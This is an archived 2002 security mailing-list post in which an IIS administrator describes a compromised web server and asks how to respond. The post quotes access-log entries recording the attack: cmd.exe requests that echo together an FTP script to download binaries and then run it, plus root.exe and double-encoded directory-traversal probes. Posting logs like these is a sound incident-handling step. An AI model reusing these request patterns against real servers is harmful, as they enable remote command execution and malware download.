Help, I recently found this on my IIS server after being contacted that my webserver attempted to scan someone's machine on port 80. I've looked on my web box and found that the following file was installed: msxc32.exe, which seems to be the mIRC program, which is some type of chat program. I've talked to other techs here who have not installed this program. I've traced the following IP addresses back to the domain admins, but before I contact them I need to know if this is the intruder's IP address and what would be the best course of action. On the flip side, what do I need to do to prevent this from happening in the future? I have since blocked these addresses, but this is only a temp fix.

18:56:21 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr 502
18:56:23 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
18:56:25 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
18:56:27 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
18:56:33 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
18:56:35 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
18:56:37 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 15:09:01 PST